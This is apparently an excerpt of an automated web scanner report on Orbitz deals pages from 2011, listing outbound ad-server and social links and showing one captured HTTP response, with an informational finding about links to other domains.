http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=EC1D9494D1E76EACE6C01163BD74D10F; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: anon=2674587081296662796385; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:36 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:36 GMT; Path=/
Set-Cookie: logging=EC1D9494D1E76EACE6C01163BD74D10F|egapp33p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:35 GMT
Set-Cookie: NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3273045525d5f4f58455e445a4a4217b9;path=/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 186752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=300x600_bottom&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
</style>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA6K7-G9TwmbSAW0WMeI7twRRuLtrLBmy3ZCyUfu5dRv1kHZq3GhQwwTCDcXv2m_f6QE7H9Tmg0QAwAA"></script>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=promo_activities&adsize=336x280&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=promo_activities&adsize=1x1&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296662796399&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.350. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=barbados-vacations&cnt=PKH&homeAirport=DFW\

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&
